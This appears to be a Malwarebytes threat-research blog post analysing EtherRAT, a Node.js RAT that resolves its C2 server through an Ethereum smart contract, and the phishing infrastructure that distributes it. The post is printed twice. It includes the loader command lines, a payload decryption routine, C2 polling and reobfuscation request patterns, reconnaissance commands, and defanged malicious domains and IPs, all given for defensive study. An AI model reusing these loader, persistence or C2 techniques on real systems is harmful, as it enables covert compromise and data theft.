Description
During our recent threat hunting activities, we found EtherRAT malware being distributed by a website with a strange homepage. This homepage allowed us to discover a vast malicious infrastructure distributing malware, malicious documents, remote desktop software, and phishing pages.
EtherRAT is a RAT developed in Node.js which allows an attacker to gain complete control over the machine and execute arbitrary code returned by the Command and Control (C2) server. The malware uses the Etherium blockchain to obtain the C2 server, hence the "Ether" part of the name. EtherRAT is typically distributed via MSI, PowerShell, or JavaScript scripts.
## An open directory that distributes EtherRAT: where it all began
While threat hunting, we found an open directory that was distributing MSI installers and PowerShell scripts, which ultimately distributed EtherRAT. In the analyzed cases, the PowerShell scripts and MSI installers were distributed from a “/install” folder. The versions have a progressive number, ranging from v1 to v10.
_Open Directory hosting EtherRAT MSI _
The returned home page caught our attention and prompted us to further explore the campaign.
_The homepage returned by the EtherRAT distribution website_
Analyzing domains and associated IPs with the EtherRAT distribution, we detected other similar home pages with a hacking-style theme. They appeared to belong to a larger distribution chain, which also distributes phishing, remote control software, and other malware. These websites usually have several folders with malware and phishing related content, and what is displayed depends on the specific infection chain.
Different websites that resolve to the same IP addresses have previously returned pages related to fake companies or default templates. The use of these new pages could therefore be a method to make detection more difficult for automated scanners or researchers. Here are some of the home pages we found:
_Some of the malicious websites indexed on Google_
EtherRAT is an interesting RAT, as it has few lines of code and allows the execution of arbitrary code returned by the C2 server. Furthermore, using the Ethereum blockchain to obtain the C2 server makes it more resilient to infrastructure takedowns.
# Technical analysis of EtherRAT
The detected websites usually distribute an MSI or PowerShell script with the version name, such as v1.msi, v2.ps1, and so on.
## MSI Loader
The MSI file "v9.msi" contains three components:
**MSI Filename** | **Description**
---|---
KmPuGimn.cmd | BAT launcher
cDQMlQAru0.xml | First Jscript loader
MRaQCipBIZeiZNx.log | Encrypted EtherRAT
When the MSI is executed, the “KmPuGimn.cmd” file is started:
conhost --headless cmd /c "KmPuGimn.cmd"
This obfuscated BAT file performs different operations:
* Extracts the other files in a random folder in %LOCALAPPDATA%.
* Re-executes itself via:
* %SystemRoot%\System32\conhost.exe -headless %SystemRoot%\System32\cmd.exe /c call "C:\Users\\{user}\AppData\Local\\{random_path}\KmPuGimn.cmd" nKWa
* Runs the command “where node” to find an existing installation.
* Downloads Node.js if it’s not found
* Uses "curl -sLo" to download Node.js from the official website.
* Extracts to installation directory via "tar -xf".
* Renames extracted directory to "28Q75h".
* Loops until both "MRaQCipBIZeiZNx.log" and "cDQMlQAru0.xml" exist, then executes:
* conhost.exe -headless C:\Users\\{user}\AppData\Local\\{random_path}\\{random_path}\node.exe cDQMlQAru0.xml
The executed "cDQMlQAru0.xml" is a loader that decrypts the embedded code with a XOR function and then executes it with "vm.compileFunction".
decrypted[i] = (encrypted[i] - key[i % key.length] - i) & 0xFF
_The embedded decrypted code_
The decrypted code:
* Copies node.exe in "C:\Users\\{user}\AppData\Local\\{random_path}\\{random_path}\\_MJlLlt5.exe".
* Adds a registry key for persistence with "conhost.exe –headless".
* Decrypts "MRaQCipBIZeiZNx.log" and executes it with "_MJlLlt5.exe" stdin.
The decryption algorithm is a custom stream-like decoding routing based on XOR, byte rotations and an accumulator:
for e in range(len(data)):
byte = data[e]
g = prev
prev = byte
byte = (byte - g) & 0xff
byte = byte ^ n[e % len(n)] ^ ((e >> 8) & 0xff)
byte = si[byte]
byte = (byte - k[e % len(k)]) & 0xff
result[e] = byte
The final stage is to deploy EtherRAT. EtherRAT allows the attacker to:
* Execute arbitrary JavaScript code received by the C2 server. This allows the attacker to execute new commands, perform operations on files and folders, modify the registry, and exfiltrate data.
* Get a new C2 server using the Ethereum blockchain.
* Reobfuscate itself.
* Save the logs to "svchost.log".
_Part of decrypted EtherRAT code_
The EtherRAT uses Ethereum's "eth_call" JSON-RPC method to retrieve the active C2 URL from a smart contract on the Ethereum mainnet.
The blockchain parameters in this case are:
* Contract: 0x88ea8d0bc4146f0a018e989df3fd089ac48f9a58
* Function selector: 0x7d434425
* Argument: 0xf6a772e163e64b07f658946f863b5d457d88f9f0
_The decoded C2 from Ethereum blockchain_
The contacted URLs to obtain the C2 server endpoint are:
* mainnet[.]gateway[.]tenderly[.]co
* rpc[.]flashbots[.]net/fast
* rpc[.]mevblocker[.]io
* eth-mainnet[.]public[.]blastapi[.]io
* ethereum-rpc[.]publicnode[.]com
* eth[.]drpc[.]org
* eth[.]merkle[.]io
Polling requests use randomized URL patterns based on some parameters defined in the code:
GET /api/<4-byte-hex>/<victim-uuid>/<4-byte-hex>.<ext>?<param>=<build-id>
X-Bot-Server: <c2_url>
In the analyzed sample, the parameters are:
* Build ID: "6f816d80-0d6c-4384-9cd6-6b79965fc08f"
* ext: randomly selected from "png", "jpg", "gif", "css", "ico", "webp".
* param: randomly selected from "id", "token", "key", "b", "q", "s", "v".
After startup, the RAT sends its own source code to the C2 server. The C2 responds with a newly obfuscated version of the script, which is written back to disk, making each execution generate a new file hash.
POST /api/[REOBF_PATH]/<victim-uuid>
Body: { "code": "<current_script_contents>", "build": "<build_id>" }
After the EtherRAT execution, we observed different post-compromised cmd.exe activities to check the environment. For example:
* powershell -NoProfile -NonInteractive -WindowStyle Hidden -Command "(Get-WmiObject Win32_VideoController).Name"
* reg query "HKLM\SOFTWARE\Microsoft\Cryptography" /v MachineGuid
* powershell -NoProfile -NonInteractive -WindowStyle Hidden -Command "(Get-WmiObject Win32_ComputerSystem).Domain"
* powershell -NoProfile -NonInteractive -WindowStyle Hidden -Command "(Get-WmiObject Win32_ComputerSystem).PartOfDomain"
* cmd.exe /d /s /c "net session"
_EtherRAT logs_
### PowerShell Loader
The activities performed by the PowerShell loaders are very similar to the last stage of the JS script of the MSI installer:
* Downloads Node.js if it’s not present.
* Create the necessary directories.
* Decode the EtherRAT with a custom decryption algorithm.
* Execute Node.js with conhost.exe and the decrypted EtherRAT payload.
We detected some variants of the PowerShell loader hosted on these websites; namely that the functions' names and the decryption functions change in the analyzed PowerShell scripts.
_The decryption of EtherRAT payload with the custom decryption algorithm_
# Tracking the malicious infrastructure
When we analyzed the different websites with the "hacking-theme" pages, we found that in the past many had hosted multiple phishing pages in some specific paths. For example:
* /zht/sharep-redirect.html
* /bl/me.php
* /t/teams
* /teams/Windows/invite.php
It seems that these domains and IPs are actually part of a much larger infrastructure that distributes malware, phishing, malicious documents, and remote software. It is possible that these infrastructures are shared by multiple threat actors who activate different URL endpoints based on the specific campaign.
Interestingly, the majority of the domains related to this malicious infrastructure in the past also returned an HTML page related to a "Bulletproof Infrastructure" service.
We found that these phishing campaigns typically start via emails with documents attached, such as PDF or Excel files. These documents ask the user to click a link to view another document. Below are two examples of the phishing documents attached to the emails:
These phishing pages typically ask the user to enter their email address, then continue the infection chain and distribute phishing or malware pages. Below are some of the phishing pages detected within the malicious infrastructure:
## Misconfigurations exposed the phishing kits
While tracking malicious websites, we found one with an open directory containing part of the phishing kit used in the campaigns.
_Open directory hosting part of phishing kits_
The open directory contained several folders with code and pages related to the phishing campaigns.
_Phishing kit code_
Additionally, some domains were misconfigured and allowed the download of "cl.zip", which contained the source code for the "URL Cloaker" pages.
_Part of "URL Cloaker" code_
## **Indicators of Compromise (IOCs)**
### **IPs**
82[.]165[.]65[.]244: malicious infrastructure
185[.]221[.]216[.]121: malicious infrastructure
43[.]163[.]233[.]166: malicious infrastructure
40[.]160[.]238[.]30: malicious infrastructure
159[.]89[.]227[.]204: malicious infrastructure
57[.]128[.]31[.]168: malicious infrastructure
### **Domains**
ivorilla[.]cloud: EtherRAT distribution
mx[.]nrlwz[.]com: EtherRAT distribution
dn[.]eyqwj[.]com: EtherRAT distribution
bi[.]mkrjcsw[.]com: EtherRAT distribution
dorqen[.]casa: EtherRAT distribution
kelvra[.]club: EtherRAT distribution
cambioefectivo[.]com: EtherRAT C2
vabelles[.]com: EtherRAT C2
tranzed[.]org: EtherRAT C2
kibrisarazi[.]com: EtherRAT C2
aravisblog[.]com: EtherRAT C2
publicspeakingtip[.]org: EtherRAT C2
## **Acknowledgement****s******
* EtherRAT: https://atos.net/en/lp/cybershield/etherrat-distribution-spoofing-administrative-tools-via-github-facades
* SharePoint reference: https://ironscales.com/threat-intelligence/no-macro-xlsx-shared-strings-aitm-redirect-credential-harvest
* * *
**Stop threats before they can do any harm.**
Malwarebytes Browser Guard blocks phishing pages and malicious sites automatically. Free, one click to install. Add it to your browser →
EtherRAT is a RAT developed in Node.js which allows an attacker to gain complete control over the machine and execute arbitrary code returned by the Command and Control (C2) server. The malware uses the Etherium blockchain to obtain the C2 server, hence the "Ether" part of the name. EtherRAT is typically distributed via MSI, PowerShell, or JavaScript scripts.
## An open directory that distributes EtherRAT: where it all began
While threat hunting, we found an open directory that was distributing MSI installers and PowerShell scripts, which ultimately distributed EtherRAT. In the analyzed cases, the PowerShell scripts and MSI installers were distributed from a “/install” folder. The versions have a progressive number, ranging from v1 to v10.
_Open Directory hosting EtherRAT MSI _
The returned home page caught our attention and prompted us to further explore the campaign.
_The homepage returned by the EtherRAT distribution website_
Analyzing domains and associated IPs with the EtherRAT distribution, we detected other similar home pages with a hacking-style theme. They appeared to belong to a larger distribution chain, which also distributes phishing, remote control software, and other malware. These websites usually have several folders with malware and phishing related content, and what is displayed depends on the specific infection chain.
Different websites that resolve to the same IP addresses have previously returned pages related to fake companies or default templates. The use of these new pages could therefore be a method to make detection more difficult for automated scanners or researchers. Here are some of the home pages we found:
_Some of the malicious websites indexed on Google_
EtherRAT is an interesting RAT, as it has few lines of code and allows the execution of arbitrary code returned by the C2 server. Furthermore, using the Ethereum blockchain to obtain the C2 server makes it more resilient to infrastructure takedowns.
# Technical analysis of EtherRAT
The detected websites usually distribute an MSI or PowerShell script with the version name, such as v1.msi, v2.ps1, and so on.
## MSI Loader
The MSI file "v9.msi" contains three components:
**MSI Filename** | **Description**
---|---
KmPuGimn.cmd | BAT launcher
cDQMlQAru0.xml | First Jscript loader
MRaQCipBIZeiZNx.log | Encrypted EtherRAT
When the MSI is executed, the “KmPuGimn.cmd” file is started:
conhost --headless cmd /c "KmPuGimn.cmd"
This obfuscated BAT file performs different operations:
* Extracts the other files in a random folder in %LOCALAPPDATA%.
* Re-executes itself via:
* %SystemRoot%\System32\conhost.exe -headless %SystemRoot%\System32\cmd.exe /c call "C:\Users\\{user}\AppData\Local\\{random_path}\KmPuGimn.cmd" nKWa
* Runs the command “where node” to find an existing installation.
* Downloads Node.js if it’s not found
* Uses "curl -sLo" to download Node.js from the official website.
* Extracts to installation directory via "tar -xf".
* Renames extracted directory to "28Q75h".
* Loops until both "MRaQCipBIZeiZNx.log" and "cDQMlQAru0.xml" exist, then executes:
* conhost.exe -headless C:\Users\\{user}\AppData\Local\\{random_path}\\{random_path}\node.exe cDQMlQAru0.xml
The executed "cDQMlQAru0.xml" is a loader that decrypts the embedded code with a XOR function and then executes it with "vm.compileFunction".
decrypted[i] = (encrypted[i] - key[i % key.length] - i) & 0xFF
_The embedded decrypted code_
The decrypted code:
* Copies node.exe in "C:\Users\\{user}\AppData\Local\\{random_path}\\{random_path}\\_MJlLlt5.exe".
* Adds a registry key for persistence with "conhost.exe –headless".
* Decrypts "MRaQCipBIZeiZNx.log" and executes it with "_MJlLlt5.exe" stdin.
The decryption algorithm is a custom stream-like decoding routing based on XOR, byte rotations and an accumulator:
for e in range(len(data)):
byte = data[e]
g = prev
prev = byte
byte = (byte - g) & 0xff
byte = byte ^ n[e % len(n)] ^ ((e >> 8) & 0xff)
byte = si[byte]
byte = (byte - k[e % len(k)]) & 0xff
result[e] = byte
The final stage is to deploy EtherRAT. EtherRAT allows the attacker to:
* Execute arbitrary JavaScript code received by the C2 server. This allows the attacker to execute new commands, perform operations on files and folders, modify the registry, and exfiltrate data.
* Get a new C2 server using the Ethereum blockchain.
* Reobfuscate itself.
* Save the logs to "svchost.log".
_Part of decrypted EtherRAT code_
The EtherRAT uses Ethereum's "eth_call" JSON-RPC method to retrieve the active C2 URL from a smart contract on the Ethereum mainnet.
The blockchain parameters in this case are:
* Contract: 0x88ea8d0bc4146f0a018e989df3fd089ac48f9a58
* Function selector: 0x7d434425
* Argument: 0xf6a772e163e64b07f658946f863b5d457d88f9f0
_The decoded C2 from Ethereum blockchain_
The contacted URLs to obtain the C2 server endpoint are:
* mainnet[.]gateway[.]tenderly[.]co
* rpc[.]flashbots[.]net/fast
* rpc[.]mevblocker[.]io
* eth-mainnet[.]public[.]blastapi[.]io
* ethereum-rpc[.]publicnode[.]com
* eth[.]drpc[.]org
* eth[.]merkle[.]io
Polling requests use randomized URL patterns based on some parameters defined in the code:
GET /api/<4-byte-hex>/<victim-uuid>/<4-byte-hex>.<ext>?<param>=<build-id>
X-Bot-Server: <c2_url>
In the analyzed sample, the parameters are:
* Build ID: "6f816d80-0d6c-4384-9cd6-6b79965fc08f"
* ext: randomly selected from "png", "jpg", "gif", "css", "ico", "webp".
* param: randomly selected from "id", "token", "key", "b", "q", "s", "v".
After startup, the RAT sends its own source code to the C2 server. The C2 responds with a newly obfuscated version of the script, which is written back to disk, making each execution generate a new file hash.
POST /api/[REOBF_PATH]/<victim-uuid>
Body: { "code": "<current_script_contents>", "build": "<build_id>" }
After the EtherRAT execution, we observed different post-compromised cmd.exe activities to check the environment. For example:
* powershell -NoProfile -NonInteractive -WindowStyle Hidden -Command "(Get-WmiObject Win32_VideoController).Name"
* reg query "HKLM\SOFTWARE\Microsoft\Cryptography" /v MachineGuid
* powershell -NoProfile -NonInteractive -WindowStyle Hidden -Command "(Get-WmiObject Win32_ComputerSystem).Domain"
* powershell -NoProfile -NonInteractive -WindowStyle Hidden -Command "(Get-WmiObject Win32_ComputerSystem).PartOfDomain"
* cmd.exe /d /s /c "net session"
_EtherRAT logs_
### PowerShell Loader
The activities performed by the PowerShell loaders are very similar to the last stage of the JS script of the MSI installer:
* Downloads Node.js if it’s not present.
* Create the necessary directories.
* Decode the EtherRAT with a custom decryption algorithm.
* Execute Node.js with conhost.exe and the decrypted EtherRAT payload.
We detected some variants of the PowerShell loader hosted on these websites; namely that the functions' names and the decryption functions change in the analyzed PowerShell scripts.
_The decryption of EtherRAT payload with the custom decryption algorithm_
# Tracking the malicious infrastructure
When we analyzed the different websites with the "hacking-theme" pages, we found that in the past many had hosted multiple phishing pages in some specific paths. For example:
* /zht/sharep-redirect.html
* /bl/me.php
* /t/teams
* /teams/Windows/invite.php
It seems that these domains and IPs are actually part of a much larger infrastructure that distributes malware, phishing, malicious documents, and remote software. It is possible that these infrastructures are shared by multiple threat actors who activate different URL endpoints based on the specific campaign.
Interestingly, the majority of the domains related to this malicious infrastructure in the past also returned an HTML page related to a "Bulletproof Infrastructure" service.
We found that these phishing campaigns typically start via emails with documents attached, such as PDF or Excel files. These documents ask the user to click a link to view another document. Below are two examples of the phishing documents attached to the emails:
These phishing pages typically ask the user to enter their email address, then continue the infection chain and distribute phishing or malware pages. Below are some of the phishing pages detected within the malicious infrastructure:
## Misconfigurations exposed the phishing kits
While tracking malicious websites, we found one with an open directory containing part of the phishing kit used in the campaigns.
_Open directory hosting part of phishing kits_
The open directory contained several folders with code and pages related to the phishing campaigns.
_Phishing kit code_
Additionally, some domains were misconfigured and allowed the download of "cl.zip", which contained the source code for the "URL Cloaker" pages.
_Part of "URL Cloaker" code_
## **Indicators of Compromise (IOCs)**
### **IPs**
82[.]165[.]65[.]244: malicious infrastructure
185[.]221[.]216[.]121: malicious infrastructure
43[.]163[.]233[.]166: malicious infrastructure
40[.]160[.]238[.]30: malicious infrastructure
159[.]89[.]227[.]204: malicious infrastructure
57[.]128[.]31[.]168: malicious infrastructure
### **Domains**
ivorilla[.]cloud: EtherRAT distribution
mx[.]nrlwz[.]com: EtherRAT distribution
dn[.]eyqwj[.]com: EtherRAT distribution
bi[.]mkrjcsw[.]com: EtherRAT distribution
dorqen[.]casa: EtherRAT distribution
kelvra[.]club: EtherRAT distribution
cambioefectivo[.]com: EtherRAT C2
vabelles[.]com: EtherRAT C2
tranzed[.]org: EtherRAT C2
kibrisarazi[.]com: EtherRAT C2
aravisblog[.]com: EtherRAT C2
publicspeakingtip[.]org: EtherRAT C2
## **Acknowledgement****s******
* EtherRAT: https://atos.net/en/lp/cybershield/etherrat-distribution-spoofing-administrative-tools-via-github-facades
* SharePoint reference: https://ironscales.com/threat-intelligence/no-macro-xlsx-shared-strings-aitm-redirect-credential-harvest
* * *
**Stop threats before they can do any harm.**
Malwarebytes Browser Guard blocks phishing pages and malicious sites automatically. Free, one click to install. Add it to your browser →
Basic Information
ID
MALWAREBYTES:FCB122BA82E07977E3F393F732A03DA2
Published
Jun 15, 2026 at 20:17